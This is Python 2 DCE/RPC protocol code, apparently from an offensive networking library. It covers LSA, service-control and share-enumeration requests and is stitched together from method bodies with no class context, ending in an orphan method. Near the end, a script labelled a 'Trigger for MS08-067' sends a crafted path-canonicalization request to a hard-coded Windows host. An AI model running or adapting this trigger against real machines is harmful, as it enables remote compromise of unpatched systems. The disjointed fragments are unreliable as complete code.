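    def __init__(self,
                 data=None,
                 machine_name='',
                 database_name='',
                 desired_access=0,
                 is_unicode=True):
        """Build or parse the open-policy style request.

        Args:
            data: raw wire bytes to parse; when None the fields are filled
                from the remaining arguments instead.
            machine_name: unicode machine name, marshalled as UTF-16LE. An
                empty name leaves 'MachineName'/'MachineNamePtr' unset.
            database_name: unicode database name, handled like machine_name.
            desired_access: value stored in 'DesiredAccess'.
            is_unicode: accepted for interface compatibility; not used here.

        Raises:
            struct.error: data is too short for one of the 4-byte fields.
        """
        Struct.__init__(self, data)

        if data is not None:
            pos = 0
            # unpack() returns a 1-tuple; keep the bare integer (as the
            # other parsers in this file do) so the field re-packs cleanly.
            self['MachineNamePtr'] = unpack('<L', data[pos:pos + 4])[0]
            pos += 4
            # NOTE(review): the pack side of this file sends a 0 referent id
            # with no string body; a null pointer here is still parsed as
            # if a string followed.
            self['MachineName'] = DCERPCString(data=data[pos:])
            pos += len(self['MachineName'].pack())
            self['DatabaseNamePtr'] = unpack('<L', data[pos:pos + 4])[0]
            pos += 4
            self['DatabaseName'] = DCERPCString(data=data[pos:])
            pos += len(self['DatabaseName'].pack())
            self['DesiredAccess'] = unpack('<L', data[pos:pos + 4])[0]
        else:
            if machine_name:
                self['MachineName'] = DCERPCString(
                    string=machine_name.encode('UTF-16LE'))
                self['MachineNamePtr'] = 0x20004
            if database_name:
                self['DatabaseName'] = DCERPCString(
                    string=database_name.encode('UTF-16LE'))
                self['DatabaseNamePtr'] = 0x20008
            self['DesiredAccess'] = desired_access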
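    def __init__(self, data=None, extradata=None):
        """Parse a translated-name entry.

        Args:
            data: raw bytes holding the fixed-size part of the entry; None
                leaves the struct with only what Struct.__init__ sets.
            extradata: bytes the variable-length 'Name' string is read from
                when 'Length' is non-zero (callers pass the deferred string
                area that follows the fixed entries).
        """
        Struct.__init__(self, data)

        if data is not None:
            # A zero Length means no string body exists for this entry, so
            # build an empty string instead of parsing extradata.
            # (The unused `pos = self.calcsize()` local was dropped.)
            if self['Length'] == 0:
                self['Name'] = DCERPCString(string='')
            else:
                self['Name'] = DCERPCString(data=extradata)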
    def pack(self):
        """Marshal the request: optional ServerName, then NetName and Level."""
        server_name = self['ServerName']
        if len(server_name) > 0:
            # Referent id followed by the string body.
            out = pack('<L', 0x20004)
            out += DCERPCString(string=server_name).pack()
        else:
            # An empty name is sent as a null pointer, with no string body.
            out = pack('<L', 0)

        out += DCERPCString(string=self['NetName']).pack()
        out += pack('<L', self['Level'])
        return out
    def pack(self):
        """Marshal the share array after the fixed header.

        For each of the first MaxCount entries of self.shares the fixed part
        carries (name referent id, type, comment referent id); the UTF-16LE
        name and comment strings follow afterwards in the same order.
        """
        count = self['MaxCount']
        out = Struct.pack(self)

        # Fixed part: one pointer/type/pointer triple per entry.
        for idx in range(count):
            out += pack('<L', 0x20010 + idx * 4)
            out += pack('<L', self.shares[idx]['type'])
            out += pack('<L', 0x20100 + idx * 4)

        # Deferred part: the string bodies the referents point to.
        for idx in range(count):
            entry = self.shares[idx]
            for key in ('name', 'comment'):
                out += DCERPCString(string=entry[key].encode('UTF-16LE'),
                                    is_unicode=True).pack()
        return out
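    def __init__(self, data=None, manager_handle='', service_name='', is_unicode=True):
        """Build or parse an open-service style request.

        Args:
            data: raw wire bytes to parse; None builds the request from the
                other arguments.
            manager_handle: 20-byte SCM context handle.
            service_name: unicode service name, marshalled as UTF-16LE.
            is_unicode: accepted for interface compatibility; not used here.

        Raises:
            struct.error: data is too short for the handle or the access mask.

        Note: 'AccessMask' is only set when parsing; when building it keeps
        whatever Struct.__init__ initialised it to.
        """
        Struct.__init__(self, data)

        if data is not None:
            pos = 0
            # unpack() yields a 1-tuple; store the bare value so the field
            # re-packs (the other parsers in this file do the same). The
            # '20s' unpack also enforces that all 20 handle bytes are present.
            self['ManagerHandle'] = unpack('20s', data[pos:pos + 20])[0]
            pos += 20
            self['ServiceName'] = DCERPCString(data=data[pos:])
            pos += len(self['ServiceName'].pack())
            self['AccessMask'] = unpack('<L', data[pos:pos + 4])[0]
        else:
            self['ManagerHandle'] = manager_handle
            self['ServiceName'] = DCERPCString(string=service_name.encode('UTF-16LE'))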
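    def __init__(self, data=None, ShareArray=None):
        """Build or parse the share-info array.

        Args:
            data: raw wire bytes (fixed header included); None builds the
                array from ShareArray instead.
            ShareArray: list of {'type', 'name', 'comment'} dicts used when
                data is None; the list object is stored as self.shares.
                Defaults to a fresh empty list -- the previous `[]` default
                was one list shared by every instance built without data.

        Raises:
            struct.error: data is too short for an entry's fixed part.
            UnicodeEncodeError: a name or comment on the wire is not ASCII.
        """
        Struct.__init__(self, data)
        self.shares = []

        if data is not None:
            pos = self.calcsize()
            # NOTE(review): MaxCount comes from the wire, so a peer controls
            # the loop bound; truncated input ends in struct.error or a
            # DCERPCString parse failure rather than a clean length check.
            count = self['MaxCount']
            # Fixed part: (name referent, type, comment referent) per entry.
            # All three are unpacked so short input fails as before; only
            # the type is kept.
            for _ in xrange(count):
                _, stype, _ = unpack('<LLL', data[pos:pos + 12])
                pos += 12
                self.shares.append({'type': stype})
            # Deferred part: UTF-16LE name then comment for each entry,
            # re-encoded to ASCII with the trailing character (presumably
            # the NUL terminator) dropped.
            for entry in self.shares:
                for key in ('name', 'comment'):
                    s = DCERPCString(data=data[pos:])
                    entry[key] = s.get_string().decode(
                        'UTF-16LE').encode('ascii')[:-1]
                    pos += len(s.pack())
        else:
            self.shares = [] if ShareArray is None else ShareArray
            self['MaxCount'] = len(self.shares)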
    def __init__(self, data=None, service_handle='', args=[], is_unicode=True):
        """Build or parse a start-service style request.

        Args:
            data: raw wire bytes; any falsy value (None or empty) builds the
                request from the other arguments instead.
            service_handle: value stored in 'ServiceHandle' when building.
            args: argument strings; when building they are marshalled as
                ASCII (non-unicode) DCERPCStrings. When parsing, only
                len(args) is used as the element count -- NOTE(review): the
                count is not read from data, confirm that is intended.
            is_unicode: accepted for interface compatibility; not used here.
        """
        Struct.__init__(self, data)

        if data:
            # The strings start after the 28-byte fixed header.
            self['argc'] = len(args)
            parsed = []
            pos = 28
            for _ in xrange(len(args)):
                item = DCERPCString(data=data[pos:])
                parsed.append(item)
                pos += len(item.pack())
            self['argv'] = parsed
        else:
            self['ServiceHandle'] = service_handle
            self['argc'] = len(args)
            self['argv'] = [
                DCERPCString(string=arg.encode('ASCII'), is_unicode=False)
                for arg in args
            ]
    def pack(self):
        """Marshal the lookup-names request.

        Wire order: PolicyHandle, Count twice, one (length, size, referent)
        triple per name, the name strings without a NUL terminator, padding
        to a 4-byte boundary, an empty LsaTransSidArray, LsaLookupLevel with
        a 2-byte pad, and a final zero Count.
        """
        names = self['NamesArray']
        count = self['Count']

        out = self['PolicyHandle']
        out += pack('<LL', count, count)
        # Per-name header: both length fields are len(name), then the
        # referent id 2 + index.
        for idx, name in enumerate(names):
            out += pack('<HHL', len(name), len(name), 2 + idx)
        # Deferred string bodies; the terminating NUL is suppressed.
        for name in names:
            out += DCERPCString(string=name,
                                is_unicode=True).pack(force_null_byte=0)
        # Mandatory alignment to a 4-byte boundary (adds nothing when
        # already aligned).
        out += '\0' * (-len(out) % 4)
        out += LsaTransSidArray().pack()
        out += pack('<HH', self['LsaLookupLevel'], 0)
        out += pack('<L', 0)
        return out
    def pack(self):
        """Marshal: SystemName referent id and string, ObjectAttributes, fixed fields."""
        system_name = DCERPCString(string=self['SystemName']).pack()
        head = pack('<L', 0x20004) + system_name
        return head + self['ObjectAttributes'] + Struct.pack(self)
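    def __init__(self, data=None, UsernameArray=None):
        """Build or parse the user-name array.

        Args:
            data: raw wire bytes (fixed header included); None builds the
                array from UsernameArray instead.
            UsernameArray: list of user-name strings; when data is None it
                becomes self.usernames. In both branches it is also joined
                into 'UsernameArray', as before. Defaults to a fresh empty
                list -- the previous `[]` default was shared between
                instances.

        Raises:
            struct.error: data is too short for a referent id.
            UnicodeEncodeError: a name on the wire is not ASCII.
        """
        Struct.__init__(self, data)
        self.usernames = []
        if UsernameArray is None:
            UsernameArray = []

        if data is not None:
            # Struct.__init__ above already consumed the fixed header; the
            # second call the original made here was redundant.
            pos = self.calcsize()
            # NOTE(review): MaxCount is wire-controlled; the loop bound is
            # untrusted input.
            count = self['MaxCount']
            # Fixed part: one referent id per entry. The value is not
            # needed; unpacking only verifies the bytes are present.
            for _ in xrange(count):
                unpack('<L', data[pos:pos + 4])
                pos += 4
            # Deferred part: UTF-16LE strings, re-encoded to ASCII with the
            # trailing character (presumably the NUL terminator) dropped.
            for _ in xrange(count):
                s = DCERPCString(data=data[pos:])
                self.usernames.append(
                    s.get_string().decode('UTF-16LE').encode('ascii')[:-1])
                pos += len(s.pack())
            self['UsernameArray'] = ''.join(UsernameArray)
        else:
            self.usernames = UsernameArray
            self['MaxCount'] = len(self.usernames)
            self['UsernameArray'] = ''.join(UsernameArray)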
    def pack(self):
        """Marshal: optional ServerName, UserInfo, PrefMaxLen, ResumeHandle."""
        server_name = self['ServerName']
        if len(server_name) > 0:
            # Referent id followed by the string body.
            out = pack('<L', 0x20004) + DCERPCString(string=server_name).pack()
        else:
            # Empty name: null pointer, no string body.
            out = pack('<L', 0)

        out += self['UserInfo'].pack()
        out += pack('<L', self['PrefMaxLen'])
        out += self['ResumeHandle'].pack()
        return out
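    def __init__(self, data=None, manager_handle='\x00'*20,
                                  service_name='',
                                  binary_pathname='',
                                  display_name='',
                                  start_type=SVCCTL_SERVICE_DEMAND_START,
                                  is_unicode=True):
        """Build or parse a create-service style request.

        Args:
            data: raw wire bytes to parse; None builds the request from the
                other arguments.
            manager_handle: 20-byte SCM context handle.
            service_name: unicode service name (UTF-16LE on the wire).
            binary_pathname: unicode image path (UTF-16LE on the wire).
            display_name: unicode display name; empty sends a null pointer.
            start_type: value stored in 'ServiceStartType'.
            is_unicode: accepted for interface compatibility; not used here.

        When parsing, the fixed-size fields are kept as their raw 4-byte
        slices (as before). A non-null Dependencies, ServiceStartName or
        Password referent is not supported: an error is logged and parsing
        stops, leaving the object partially filled.

        Raises:
            struct.error: data ends inside one of the three checked
                referent ids.
        """
        # Local import: this file's import block is not visible here and
        # the method previously did not need unpack().
        from struct import unpack

        Struct.__init__(self, data)

        if data is not None:
            pos = 0
            self['ManagerHandle'] = data[pos:pos+20]
            pos += 20
            self['ServiceName'] = DCERPCString(data=data[pos:])
            pos += len(self['ServiceName'].pack())
            self['DisplayNamePtr'] = data[pos:pos+4]
            # The referent id is 4 bytes; the string body starts after it.
            # Previously pos was not advanced, so the display name was
            # parsed starting at the pointer bytes (compare the
            # MachineNamePtr/MachineName pair parsed elsewhere in this file).
            # TODO(review): confirm against a capture.
            pos += 4
            # NOTE(review): a zero DisplayNamePtr carries no string body on
            # the wire; that case is still parsed as if a string followed.
            self['DisplayName'] = DCERPCString(data=data[pos:])
            pos += len(self['DisplayName'].pack())
            self['AccessMask'] = data[pos:pos+4]
            pos += 4
            self['ServiceType'] = data[pos:pos+4]
            pos += 4
            self['ServiceStartType'] = data[pos:pos+4]
            pos += 4
            self['ServiceErrorControl'] = data[pos:pos+4]
            pos += 4
            self['BinaryPathName'] = DCERPCString(data=data[pos:])
            pos += len(self['BinaryPathName'].pack())
            self['LoadOrderGroupPtr'] = data[pos:pos+4]
            pos += 4
            self['TagId'] = data[pos:pos+4]
            pos += 4
            # A raw 4-byte slice is always truthy, so the null-pointer tests
            # below look at the unpacked value (the old `if self[...]:`
            # rejected every input). logging.error replaces the misspelled
            # logging.eror, and each message now names its own field.
            self['DependenciesPtr'] = data[pos:pos+4]
            if unpack('<L', self['DependenciesPtr'])[0]:
                logging.error('SVCCTL_ERROR: DependenciesPtr != 0')
                return
            pos += 4
            self['DependSize'] = data[pos:pos+4]
            pos += 4
            self['ServiceStartNamePtr'] = data[pos:pos+4]
            if unpack('<L', self['ServiceStartNamePtr'])[0]:
                logging.error('SVCCTL_ERROR: ServiceStartNamePtr != 0')
                return
            pos += 4
            self['PasswordPtr'] = data[pos:pos+4]
            if unpack('<L', self['PasswordPtr'])[0]:
                logging.error('SVCCTL_ERROR: PasswordPtr != 0')
                return
            pos += 4
            self['PasswordSize'] = data[pos:pos+4]
        else:
            self['ManagerHandle'] = manager_handle
            self['ServiceName'] = DCERPCString(string=service_name.encode('UTF-16LE'))
            self['BinaryPathName'] = DCERPCString(string=binary_pathname.encode('UTF-16LE'))
            if display_name:
                self['DisplayName'] = DCERPCString(string=display_name.encode('UTF-16LE'))
                self['DisplayNamePtr'] = 0x20004
            else:
                # Null pointer: no display-name body is marshalled.
                self['DisplayNamePtr'] = 0
            self['ServiceStartType'] = start_type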
    def __init__(self, data=None, Name='', Sid=''):
        """Build a name/SID pair entry.

        Args:
            data: raw wire bytes; only handed to Struct.__init__, nothing
                further is parsed here and the other arguments are ignored.
            Name: unicode account name. NameLength and NameSize are both set
                to len(Name) (NOTE(review): a character count -- confirm
                whether the wire expects the UTF-16LE byte count) and the
                string is marshalled as UTF-16LE. Skipped only when None;
                the '' default still writes an empty name.
            Sid: value handed to DCERPCSid; skipped only when None.
        """
        Struct.__init__(self, data)

        if data is not None:
            return

        if Name is not None:
            name_len = len(Name)
            self['NameLength'] = name_len
            self['NameSize'] = name_len
            self['NamePtr'] = 0x2000040
            self['NameString'] = DCERPCString(string=Name.encode('UTF-16LE'))
        if Sid is not None:
            self['SidPtr'] = 0x2000050
            self['Sid'] = DCERPCSid(Sid=Sid)
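    def __init__(self, data=None, Sids=None):
        """Build or parse the translated-names array.

        Args:
            data: raw wire bytes (fixed header included). Count fixed-size
                entries follow the header and their string bodies follow the
                last entry; each entry gets the remaining string area as
                extradata.
            Sids: list used when data is None; stored as given in 'Sids' and
                counted into 'Count'/'MaxCount'. Defaults to a fresh empty
                list -- the previous `[]` default was one list shared by
                every instance, so anything appended to obj['Sids'] leaked
                into later instances.
        """
        Struct.__init__(self, data)

        if data is not None:
            pos1 = self.calcsize()
            entry_size = LsaTranslatedNameEx2().calcsize()
            # NOTE(review): Count is wire-controlled; the loop bound and the
            # derived offsets are untrusted input.
            count = self['Count']
            # Deferred string data starts right after the fixed entries.
            pos2 = pos1 + entry_size * count
            self['Names'] = []
            for _ in xrange(count):
                name = LsaTranslatedNameEx2(data=data[pos1:],
                                            extradata=data[pos2:])
                self['Names'].append(name)
                pos1 += name.calcsize()
                name_str = name.get_name()['Name']
                if len(name_str):
                    # Advance past this entry's string body; the non-unicode
                    # DCERPCString is built only to measure the packed size.
                    pos2 += len(
                        DCERPCString(string=name_str, is_unicode=False).pack())
        else:
            if Sids is None:
                Sids = []
            self['Count'] = len(Sids)
            self['NamesPtr'] = 0x020010
            self['MaxCount'] = len(Sids)
            self['Sids'] = Sids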
    def __init__(self, data=None, ShareArray=[]):
        """Parse a single share-info record.

        Args:
            data: raw wire bytes. Nine leading 4-byte fields are read in
                order (referent, referent, Type, referent, Permission,
                MaxUses, CurrentUses, referent, referent); only the named
                ones are stored. Then NetName, Comment, Path and Passwd
                follow as UTF-16LE strings, re-encoded to ASCII with the
                trailing character dropped.
            ShareArray: accepted but not used; building from a list is
                still a TODO.

        Raises:
            struct.error: data ends inside a fixed field.
            UnicodeEncodeError: a string on the wire is not ASCII.
        """
        Struct.__init__(self, data)
        self.shares = []

        if data is None:
            return  # TODO: build from ShareArray

        # Fixed part. Every slot is unpacked so truncated input fails
        # exactly where it used to; None marks a skipped referent id.
        layout = (None, None, 'Type', None, 'Permission', 'MaxUses',
                  'CurrentUses', None, None)
        pos = 0
        for field in layout:
            value = unpack('<L', data[pos:pos + 4])[0]
            pos += 4
            if field is not None:
                self[field] = value

        # Deferred string bodies, in wire order.
        for field in ('NetName', 'Comment', 'Path', 'Passwd'):
            item = DCERPCString(data=data[pos:])
            self[field] = item.get_string().decode('UTF-16LE').encode('ascii')[:-1]
            pos += len(item.pack())
# Standalone Python 2 script (print statement, str used as a byte buffer).
import sys
from struct import pack

# Make the repository root importable when run from the project directory.
if '.' not in sys.path:
    sys.path.append('.')

from libs.newsmb.libdcerpc import DCERPC, DCERPCString


print '***** Testing Windows 2000 Trigger for MS08-067 *****'

# Request buffer is assembled as a raw byte string.
path = u'A\\..\\..\\'.encode('UTF-16LE')
mark = len(path)  # NOTE(review): not used anywhere in this script

path += u'\0'.encode('UTF-16LE')
data =''
data += pack('<L', 1)
data += DCERPCString(string = u'EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE'.encode('UTF-16LE')).pack()
data += '\0\0'
data += DCERPCString(string = path).pack()
data += '\0\0'
data += pack('<L', 2)
data += DCERPCString(string = u'\\'.encode('UTF-16LE')).pack()
data += pack('<LL', 1, 1)

# Endpoint address and pipe are hard-coded and environment-specific.
dce = DCERPC(u'ncacn_np:192.168.2.107[\\browser]', getsock=None)
#dce.max_dcefrag = 100
dce.bind(u'4b324fc8-1670-01d3-1278-5a47bf6ee188', u'3.0') #, RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
dce.call(0x1f, data, response=True)
# Response bytes are printed hex-encoded (Python 2 str.encode('hex')).
print dce.reassembled_data.encode('hex')
 def unpack_name(self, data):
     """Parse raw bytes into the 'NameString' field as a DCERPCString."""
     parsed = DCERPCString(data=data)
     self['NameString'] = parsed